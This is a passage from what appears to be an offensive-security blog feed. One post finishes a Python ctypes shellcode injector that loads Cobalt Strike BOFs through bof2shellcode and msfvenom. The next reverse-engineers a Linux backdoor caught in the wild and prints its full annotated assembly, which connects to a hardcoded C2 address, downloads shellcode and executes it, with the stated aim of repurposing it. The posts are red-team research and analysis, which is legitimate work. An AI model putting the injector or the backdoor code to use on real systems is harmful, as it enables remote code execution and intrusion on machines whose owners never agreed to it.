<span class="n">ULONG_PTR</span> <span class="o">=</span> <span class="n">c_ulonglong</span> <span class="k">if</span> <span class="n">isx64</span> <span class="k">else</span> <span class="n">DWORD</span>
<span class="n">SIZE_T</span> <span class="o">=</span> <span class="n">ULONG_PTR</span>

<span class="c1"># Functions Prototypes
</span><span class="n">VirtualProtect</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">VirtualProtect</span>
<span class="n">VirtualProtect</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">BOOL</span>
<span class="n">VirtualProtect</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">PDWORD</span> <span class="p">]</span>

<span class="c1"># HeapAlloc()
</span><span class="n">HeapAlloc</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">HeapAlloc</span>
<span class="n">HeapAlloc</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">LPVOID</span>
<span class="n">HeapAlloc</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span> <span class="n">HANDLE</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="p">]</span>

<span class="c1"># HeapCreate()
</span><span class="n">HeapCreate</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">HeapCreate</span>
<span class="n">HeapCreate</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span><span class="n">DWORD</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">]</span>
<span class="n">HeapCreate</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">HANDLE</span>

<span class="c1"># RtlMoveMemory()
</span><span class="n">RtlMoveMemory</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">RtlMoveMemory</span>
<span class="n">RtlMoveMemory</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span><span class="n">LPVOID</span><span class="p">,</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">SIZE_T</span> <span class="p">]</span>
<span class="n">RtlMoveMemory</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">LPVOID</span>

<span class="c1"># CreateThread()
</span><span class="n">CreateThread</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">CreateThread</span>
<span class="n">CreateThread</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">SIZE_T</span><span class="p">,</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">LPVOID</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="p">]</span>
<span class="n">CreateThread</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">HANDLE</span>

<span class="c1"># WaitForSingleObject()
</span><span class="n">WaitForSingleObject</span> <span class="o">=</span> <span class="n">_kernel32</span><span class="p">.</span><span class="n">WaitForSingleObject</span>
<span class="n">WaitForSingleObject</span><span class="p">.</span><span class="n">argtypes</span> <span class="o">=</span> <span class="p">[</span><span class="n">HANDLE</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">]</span>
<span class="n">WaitForSingleObject</span><span class="p">.</span><span class="n">restype</span> <span class="o">=</span> <span class="n">DWORD</span>


<span class="n">heapHandle</span> <span class="o">=</span> <span class="n">HeapCreate</span><span class="p">(</span><span class="n">HEAP_CREATE_ENABLE_EXECUTE</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">bufAddr</span> <span class="o">=</span> <span class="n">HeapAlloc</span><span class="p">(</span><span class="n">heapHandle</span><span class="p">,</span> <span class="n">HEAP_ZERO_MEMORY</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>  <span class="c1"># use the pointer returned by HeapAlloc, not the heap handle</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Heap buffer allocated at: {:08X}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">bufAddr</span><span class="p">))</span>
<span class="n">RtlMoveMemory</span><span class="p">(</span><span class="n">bufAddr</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Shellcode copied into memory.'</span><span class="p">)</span>

<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">bufAddr</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">),</span> <span class="n">PAGE_EXECUTE</span> <span class="p">,</span> <span class="n">ctypes</span><span class="p">.</span><span class="n">c_ulong</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Set execute-only permissions on memory'</span><span class="p">)</span>
<span class="n">threadHandle</span> <span class="o">=</span> <span class="n">CreateThread</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">bufAddr</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[+] Executed Thread in current process.'</span><span class="p">)</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">threadHandle</span><span class="p">,</span> <span class="mh">0xFFFFFFFF</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></figure>
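<p>To make the difference between execute-only and the more common RX/RWX protections explicit, here is a minimal sketch that maps the Windows page-protection constants to the access they grant. The helper names <code class="language-plaintext highlighter-rouge">describe_protection</code> and <code class="language-plaintext highlighter-rouge">can_self_modify</code> are made up for illustration, and modifier flags such as PAGE_GUARD are deliberately not handled:</p>

```python
# Base Windows page-protection constants and the access each one grants.
# Modifier flags (PAGE_GUARD, PAGE_NOCACHE, ...) are out of scope for this sketch.
PAGE_PROTECTIONS = {
    0x01: ("PAGE_NOACCESS", ""),
    0x02: ("PAGE_READONLY", "R"),
    0x04: ("PAGE_READWRITE", "RW"),
    0x08: ("PAGE_WRITECOPY", "RW"),
    0x10: ("PAGE_EXECUTE", "X"),
    0x20: ("PAGE_EXECUTE_READ", "RX"),
    0x40: ("PAGE_EXECUTE_READWRITE", "RWX"),
    0x80: ("PAGE_EXECUTE_WRITECOPY", "RWX"),
}


def describe_protection(value):
    """Return (constant name, access string) for a base protection value."""
    return PAGE_PROTECTIONS[value]


def can_self_modify(value):
    """Hypothetical helper: True if code living in such a page may rewrite itself."""
    _, access = describe_protection(value)
    return "W" in access
```

<p>With the injector above, <code class="language-plaintext highlighter-rouge">can_self_modify(0x10)</code> is false, which is why self-decoding stubs are expected to fail unless the protection is relaxed.</p>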

<p>At this point we just need to generate shellcode with bof2shellcode from a BOF of our choice. I opted for TrustedSec’s <a href="https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/SA/tasklist/tasklist.x64.o">Tasklist</a> and used bof2shellcode to generate the resulting shellcode, which includes the COFFLoader:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="code"><pre>python3 bof2shellcode.py <span class="nt">-i</span> /home/naksyn/bofs/tasklist.x64.o <span class="nt">-o</span> tasklist.x64.bin
</pre></td></tr></tbody></table></code></pre></figure>

<p>I then used msfvenom to turn tasklist.x64.bin into a byte string that can be pasted straight into a Python script:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="code"><pre>msfvenom <span class="nt">-p</span> generic/custom <span class="nv">PAYLOADFILE</span><span class="o">=</span>tasklist.x64.bin <span class="nt">-f</span> python <span class="o">&gt;</span> sc_tasklist.txt
</pre></td></tr></tbody></table></code></pre></figure>
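<p>If msfvenom is not at hand, the same conversion can be sketched in a few lines of Python. This is not what I used, just a rough equivalent; the function name <code class="language-plaintext highlighter-rouge">to_python_literal</code> and the <code class="language-plaintext highlighter-rouge">buf</code> variable name are assumptions chosen for illustration:</p>

```python
def to_python_literal(data, var_name="buf", width=16):
    """Render raw bytes as Python source that rebuilds them chunk by chunk."""
    lines = ['{} = b""'.format(var_name)]
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        # Emit every byte as an explicit \xNN escape so the output is pure ASCII.
        escaped = "".join("\\x{:02x}".format(byte) for byte in chunk)
        lines.append('{} += b"{}"'.format(var_name, escaped))
    return "\n".join(lines)


# Example usage (the file name is the one produced by bof2shellcode above):
#   with open("tasklist.x64.bin", "rb") as handle:
#       print(to_python_literal(handle.read()))
```

<p>The generated lines can then be pasted into the injector in place of the <code class="language-plaintext highlighter-rouge">calc</code> byte string.</p>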

<p>After pasting the shellcode into the Python injector script, let’s watch Python cough out the tasklist BOF output:</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/1TNE4Esjg8IwWmaCa28wWm9C7IDuU4Hm0/preview" allowfullscreen=""></iframe>
</div>


<h3 id="outro">Outro</h3>
<p>I’ve always been amazed by crowdsourced capabilities and their integration into toolsets. Some time ago <a href="https://twitter.com/joevest">Joe Vest</a> kickstarted the <a href="https://cobalt-strike.github.io/community_kit/">Community Kit</a>, a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike. These extensions are written by some of the smartest people in the industry, and being able to leverage them in other C2s is undoubtedly a “must have” feature.
Indeed, a few days ago <a href="https://twitter.com/LittleJoeTables">Moloch</a> <a href="https://github.com/BishopFox/sliver/pull/573">added support for extensions/BOFs</a> to the <a href="https://github.com/BishopFox/sliver">Sliver</a> framework, written in Go.
The same capability could be leveraged with some effort on every C2 with Python-based agents and this post described one way to do it.</p>]]></content><author><name>Naksyn</name></author><category term="injection" /><category term="injection" /><category term="shellcode" /><category term="python" /><category term="BOF" /><category term="cobalt strike" /><category term="coff" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Repurposing a Linux Assembly backdoor caught in the wild</title><link href="https://www.naksyn.com/backdoor/2020/04/13/repurposing-linux-backdoor.html" rel="alternate" type="text/html" title="Repurposing a Linux Assembly backdoor caught in the wild" /><published>2020-04-13T00:00:00-04:00</published><updated>2020-04-13T17:10:20-04:00</updated><id>https://www.naksyn.com/backdoor/2020/04/13/repurposing-linux-backdoor</id><content type="html" xml:base="https://www.naksyn.com/backdoor/2020/04/13/repurposing-linux-backdoor.html"><![CDATA[<p><img src="/images/radare2.png" alt="image-center" title="Cutter backdoor disassembly" class="align-center" /></p>

<p>This work is based on Aneesh Dogra’s <a href="https://anee.me/reversing-a-real-world-249-bytes-backdoor-aadd876c0a32">blog post</a> describing a new, small Linux backdoor caught in the wild. The backdoor’s main functions are explained fairly well in the blog post; however, I wanted to dig deeper and look under the hood to check how this backdoor can be repurposed.
I thought this might also be a good opportunity to sharpen my assembly skills while exploring some interesting concepts.
The backdoor essentially calls back to a C2 and downloads shellcode to be executed in the context of the current process.</p>

<p>As we are dealing with a 64-bit ELF, keep in mind that Linux x86_64 system calls use designated registers for their arguments.
The registers for the x86_64 syscall calling sequence are:</p>
<ul>
  <li>RAX -&gt; system call number</li>
  <li>RDI -&gt; first argument</li>
  <li>RSI -&gt; second argument</li>
  <li>RDX -&gt; third argument</li>
  <li>R10 -&gt; fourth argument</li>
  <li>R8 -&gt; fifth argument</li>
  <li>R9 -&gt; sixth argument</li>
</ul>
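<p>As a quick reference while reading the disassembly, the convention above can be sketched as a small Python helper. The name <code class="language-plaintext highlighter-rouge">syscall_registers</code> is made up for illustration; it only builds the expected register state and does not execute anything:</p>

```python
# Argument registers for Linux x86_64 syscalls, in positional order.
SYSCALL_ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")


def syscall_registers(number, *args):
    """Return the register state expected right before the syscall instruction."""
    if len(args) > len(SYSCALL_ARG_REGISTERS):
        raise ValueError("x86_64 Linux syscalls take at most six arguments")
    registers = {"rax": number}
    # Pair each positional argument with its designated register.
    registers.update(zip(SYSCALL_ARG_REGISTERS, args))
    return registers
```

<p>For example, <code class="language-plaintext highlighter-rouge">syscall_registers(41, 2, 1, 0)</code> describes a socket call with RAX=41, RDI=2, RSI=1 and RDX=0.</p>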

<p>The return value of a syscall is placed in the RAX register. Since RAX also holds the syscall number before the call, it’s handy to keep the <a href="https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl">syscall table from the Linux kernel</a> at hand to map each number to the syscall being invoked in the assembly code.
Syscalls are the interface between user programs and the Linux kernel. They let the kernel perform various system tasks on behalf of the program, such as file access, process management and networking.
Now let’s get our hands dirty and reverse the most important functionalities of the backdoor that Aneesh kindly <a href="https://github.com/lionaneesh/backdoors/blob/master/pay.bin">provided</a>.
Here is the full backdoor assembly with the comments I added during my analysis:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="code"><pre><span class="err">129:</span> <span class="nf">entry0</span> <span class="p">(</span><span class="nv">int64_t</span> <span class="nv">arg3</span><span class="p">)</span><span class="c1">;</span>
<span class="c1">;</span>
<span class="err">0</span><span class="nf">x00400078</span>      <span class="nv">xor</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x0040007b</span>      <span class="nv">push</span> <span class="mi">9</span>             
<span class="err">0</span><span class="nf">x0040007d</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040007e</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040007f</span>      <span class="nv">mov</span> <span class="nb">dh</span><span class="p">,</span> <span class="mh">0x10</span>       <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x00400081</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rdx</span>       <span class="c1">; arg3 ; 4096</span>
<span class="err">0</span><span class="nf">x00400084</span>      <span class="nv">xor</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400087</span>      <span class="nv">push</span> <span class="mh">0x22</span>          <span class="c1">; 34</span>
<span class="err">0</span><span class="nf">x00400089</span>      <span class="nv">pop</span> <span class="nv">r10</span>
<span class="err">0</span><span class="nf">x0040008b</span>      <span class="nv">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">7</span>
<span class="err">0</span><span class="nf">x0040008d</span>      <span class="nv">syscall</span>            <span class="c1">; mmap syscall</span>
<span class="err">0</span><span class="nf">x0040008f</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x00400092</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>
<span class="err">0</span><span class="nf">x00400094</span>      <span class="nv">push</span> <span class="mh">0xa</span>           <span class="c1">; 10</span>
<span class="err">0</span><span class="nf">x00400096</span>      <span class="nv">pop</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400098</span>      <span class="nv">push</span> <span class="nb">rsi</span>           <span class="c1">; saves 4096 on the stack for later use in the read syscall</span>
<span class="err">0</span><span class="nf">x00400099</span>      <span class="nv">push</span> <span class="nb">rax</span>           <span class="c1">; saves the mmapped address on the stack for later use in the read syscall and shellcode execution</span>
<span class="err">0</span><span class="nf">x0040009a</span>      <span class="nv">push</span> <span class="mh">0x29</span>          <span class="c1">; 41</span>
<span class="err">0</span><span class="nf">x0040009c</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040009d</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040009e</span>      <span class="nv">push</span> <span class="mi">2</span>             
<span class="err">0</span><span class="nf">x004000a0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000a1</span>      <span class="nv">push</span> <span class="mi">1</span>             
<span class="err">0</span><span class="nf">x004000a3</span>      <span class="nv">pop</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000a4</span>      <span class="nv">syscall</span>            <span class="c1">; socket syscall</span>
<span class="err">0</span><span class="nf">x004000a6</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000a9</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>        <span class="c1">; jump forward to exit block if socket unsuccessful</span>
<span class="err">0</span><span class="nf">x004000ab</span>      <span class="nv">xchg</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ad</span>      <span class="nv">movabs</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mh">0xc2edf86839050002</span> <span class="c1">; gets here if socket successful or connect unsuccessful and after nanosleep</span>
<span class="err">0</span><span class="nf">x004000b7</span>      <span class="nv">push</span> <span class="nb">rcx</span>           <span class="c1">; holds the connect addr structure</span>
<span class="err">0</span><span class="nf">x004000b8</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span>       <span class="c1">; pointer to the addr structure</span>
<span class="err">0</span><span class="nf">x004000bb</span>      <span class="nv">push</span> <span class="mh">0x10</span>          <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x004000bd</span>      <span class="nv">pop</span> <span class="nb">rdx</span>
<span class="err">0</span><span class="nf">x004000be</span>      <span class="nv">push</span> <span class="mh">0x2a</span>          <span class="c1">; 42</span>
<span class="err">0</span><span class="nf">x004000c0</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c1</span>      <span class="nv">syscall</span>            <span class="c1">; connect syscall</span>
<span class="err">0</span><span class="nf">x004000c3</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000c4</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c7</span>      <span class="nv">jns</span> <span class="mh">0x4000ee</span>       <span class="c1">; jump to read and execute shellcode if connect successful</span>
<span class="err">0</span><span class="nf">x004000c9</span>      <span class="nv">dec</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x004000cc</span>      <span class="nv">je</span> <span class="mh">0x4000e6</span>        <span class="c1">; exit once the retry counter in r9 (initially 10) has been decremented to 0</span>
<span class="err">0</span><span class="nf">x004000ce</span>      <span class="nv">push</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000cf</span>      <span class="nv">push</span> <span class="mh">0x23</span>          <span class="c1">; 35</span>
<span class="err">0</span><span class="nf">x004000d1</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000d2</span>      <span class="nv">push</span> <span class="mi">0</span>
<span class="err">0</span><span class="nf">x004000d4</span>      <span class="nv">push</span> <span class="mi">5</span>             
<span class="err">0</span><span class="nf">x004000d6</span>      <span class="nv">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span>
<span class="err">0</span><span class="nf">x004000d9</span>      <span class="nv">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000dc</span>      <span class="nv">syscall</span>            <span class="c1">; nanosleep syscall</span>
<span class="err">0</span><span class="nf">x004000de</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000df</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000e0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000e1</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e4</span>      <span class="nv">jns</span> <span class="mh">0x4000ad</span>       <span class="c1">; jump back and retry connect unless nanosleep returned an error</span>
<span class="err">0</span><span class="nf">x004000e6</span>      <span class="nv">push</span> <span class="mh">0x3c</span>          <span class="c1">; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed</span>
<span class="err">0</span><span class="nf">x004000e8</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e9</span>      <span class="nv">push</span> <span class="mi">1</span>             
<span class="err">0</span><span class="nf">x004000eb</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ec</span>      <span class="nv">syscall</span>            <span class="c1">; exit syscall</span>
<span class="err">0</span><span class="nf">x004000ee</span>      <span class="nv">pop</span> <span class="nb">rsi</span>            <span class="c1">; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack</span>
<span class="err">0</span><span class="nf">x004000ef</span>      <span class="nv">pop</span> <span class="nb">rdx</span>            <span class="c1">; 4096 bytes to be read from connect file descriptor</span>
<span class="err">0</span><span class="nf">x004000f0</span>      <span class="nv">syscall</span>            <span class="c1">; read syscall; rdi=connect file descriptor</span>
<span class="err">0</span><span class="nf">x004000f2</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000f5</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>
<span class="err">0</span><span class="nf">x004000f7</span>      <span class="nv">jmp</span> <span class="nb">rsi</span>            <span class="c1">; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space</span>
</pre></td></tr></tbody></table></code></pre></figure>
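<p>The 64-bit constant loaded into RCX at 0x004000ad is the first 8 bytes of a <code class="language-plaintext highlighter-rouge">sockaddr_in</code> structure: a little-endian address family, followed by the port and the IPv4 address in network byte order. A minimal sketch for decoding it, where the function name <code class="language-plaintext highlighter-rouge">decode_sockaddr_in</code> is an assumption chosen for illustration:</p>

```python
def decode_sockaddr_in(qword):
    """Split a 64-bit immediate into (family, port, ip) as laid out in memory."""
    raw = qword.to_bytes(8, "little")          # x86_64 stores the immediate little-endian
    family = int.from_bytes(raw[0:2], "little")  # sin_family is in host byte order
    port = int.from_bytes(raw[2:4], "big")       # sin_port is in network byte order
    ip = ".".join(str(octet) for octet in raw[4:8])  # sin_addr, one octet per byte
    return family, port, ip


# Constant taken from the movabs instruction in the listing above.
family, port, ip = decode_sockaddr_in(0xC2EDF86839050002)
```

<p>For the backdoor’s constant this yields family 2 (AF_INET), port 1337 and address 104.248.237.194, which is exactly the value to patch when repurposing the binary.</p>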

<p>Let’s start from the beginning and divide the assembly into chunks, each one ending at a syscall. Keep in mind that the backdoor connects to a C2 and executes shellcode, so somewhere along the journey we should expect networking and memory-related syscalls.</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="code"><pre><span class="err">0</span><span class="nf">x00400078</span>      <span class="nv">xor</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x0040007b</span>      <span class="nv">push</span> <span class="mi">9</span>             
<span class="err">0</span><span class="nf">x0040007d</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040007e</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040007f</span>      <span class="nv">mov</span> <span class="nb">dh</span><span class="p">,</span> <span class="mh">0x10</span>       <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x00400081</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rdx</span>       <span class="c1">; arg3 ; 4096</span>
<span class="err">0</span><span class="nf">x00400084</span>      <span class="nv">xor</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400087</span>      <span class="nv">push</span> <span class="mh">0x22</span>          <span class="c1">; 34</span>
<span class="err">0</span><span class="nf">x00400089</span>      <span class="nv">pop</span> <span class="nv">r10</span>
<span class="err">0</span><span class="nf">x0040008b</span>      <span class="nv">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">7</span>
<span class="err">0</span><span class="nf">x0040008d</span>      <span class="nv">syscall</span>            <span class="c1">; mmap syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>Syscall number 9 maps to the mmap function. This is the mmap function declaration:
<code class="language-plaintext highlighter-rouge">void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code>
We should keep it in mind while poking around the registers to understand how mmap is called. From the assembly we can infer the following:</p>
<ul>
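  <li>addr -&gt; RDI=0 (NULL, so the kernel chooses the address)</li>
  <li>length -&gt; RSI=0x1000 (4096 bytes, one page on x86 Linux)</li>
  <li>prot -&gt; RDX=0x1007 (PROT_READ | PROT_WRITE | PROT_EXEC = 0x7, plus the 0x1000 bit left over in DH from setting the length)</li>
  <li>flags -&gt; R10=0x22 (MAP_PRIVATE | MAP_ANONYMOUS)</li>
  <li>fd -&gt; R8=0 (not set explicitly in the listing; the fd argument is ignored for MAP_ANONYMOUS mappings on Linux)</li>
  <li>offset -&gt; R9=0</li>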
</ul>
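<p>The register values in the list above can be double-checked by replaying the instructions in Python and splitting the results into flag names. This is only a sketch: the flag values are the Linux x86_64 ones, and the helper names <code class="language-plaintext highlighter-rouge">mmap_registers</code> and <code class="language-plaintext highlighter-rouge">decode_bits</code> are made up for illustration:</p>

```python
PROT_FLAGS = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}
MAP_FLAGS = {0x02: "MAP_PRIVATE", 0x20: "MAP_ANONYMOUS"}


def mmap_registers():
    """Replay the register setup that precedes the mmap syscall."""
    rdx = 0                              # cdq: EAX=9 is positive, so EDX is cleared
    rdx = (rdx & ~0xFF00) | (0x10 << 8)  # mov dh, 0x10 -> RDX = 0x1000
    rsi = rdx                            # mov rsi, rdx -> length = 4096
    rdx = (rdx & ~0xFF) | 7              # mov dl, 7    -> RDX = 0x1007
    return {"rax": 9, "rdi": 0, "rsi": rsi, "rdx": rdx, "r10": 0x22, "r9": 0}


def decode_bits(value, names):
    """Return (known flag names, leftover bits not covered by names)."""
    found = []
    leftover = value
    for bit, name in sorted(names.items()):
        if value & bit:
            found.append(name)
            leftover &= ~bit
    return found, leftover
```

<p>Decoding RDX this way returns the three PROT_* flags plus a leftover of 0x1000, the residue of reusing DH to build the length; decoding R10 returns MAP_PRIVATE and MAP_ANONYMOUS with nothing left over.</p>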

<p>To better understand its arguments let’s summon the mmap man page:</p>
<blockquote>
  <p>mmap() creates a new mapping in the virtual address space of the calling process.  The starting address for the new mapping is specified in addr.  The length argument specifies the length of the mapping (which must be greater than 0). If addr is NULL, then the kernel chooses the (page-aligned) address at which to create the mapping; this is the most portable method of creating a new mapping.  If addr is not NULL, then the kernel takes it as a hint about where to place the mapping; on Linux, the kernel will pick a nearby page boundary (but always above or equal to the value specified by /proc/sys/vm/mmap_min_addr) and attempt to create the mapping there.  If another mapping already exists there, the kernel picks a new address that may or may not depend on the hint. The address of the new mapping is returned as the result of the call. The prot argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file).</p>
</blockquote>

<p>From what we know so far, this tiny malware uses mmap to allocate a 4096-byte memory region in the address space of the current process,
and the page is set as readable, writable and executable.</p>

<p>Here is the next assembly chunk to be analyzed:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="code"><pre><span class="err">0</span><span class="nf">x00400094</span>      <span class="nv">push</span> <span class="mh">0xa</span>           <span class="c1">; 10</span>
<span class="err">0</span><span class="nf">x00400096</span>      <span class="nv">pop</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400098</span>      <span class="nv">push</span> <span class="nb">rsi</span>           <span class="c1">; saves 4096 on the stack for later use in the read syscall</span>
<span class="err">0</span><span class="nf">x00400099</span>      <span class="nv">push</span> <span class="nb">rax</span>           <span class="c1">; saves the mmapped address on the stack for later use in the read syscall and shellcode execution</span>
<span class="err">0</span><span class="nf">x0040009a</span>      <span class="nv">push</span> <span class="mh">0x29</span>          <span class="c1">; 41</span>
<span class="err">0</span><span class="nf">x0040009c</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040009d</span>      <span class="nv">cdq</span>                <span class="c1">; sign-extend eax into edx, so rdx = 0 (protocol)</span>
<span class="err">0</span><span class="nf">x0040009e</span>      <span class="nv">push</span> <span class="mi">2</span>             <span class="c1">; 2 = AF_INET (domain)</span>
<span class="err">0</span><span class="nf">x004000a0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000a1</span>      <span class="nv">push</span> <span class="mi">1</span>             <span class="c1">; 1 = SOCK_STREAM (type)</span>
<span class="err">0</span><span class="nf">x004000a3</span>      <span class="nv">pop</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000a4</span>      <span class="nv">syscall</span>            <span class="c1">; socket syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>Syscall number 41 is socket, declared as <code class="language-plaintext highlighter-rouge">int socket(int domain, int type, int protocol);</code>.
As per the man page:</p>
<blockquote>
  <p>socket() creates an endpoint for communication and returns a file descriptor that refers to that endpoint. The file descriptor returned by a successful call will be the lowest-numbered file descriptor not currently open for the process.</p>
</blockquote>

<p>This code snippet creates an endpoint for communication of type SOCK_STREAM (1), in the PF_INET domain (2), with protocol 0 (IP), which for a stream socket means TCP.</p>
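
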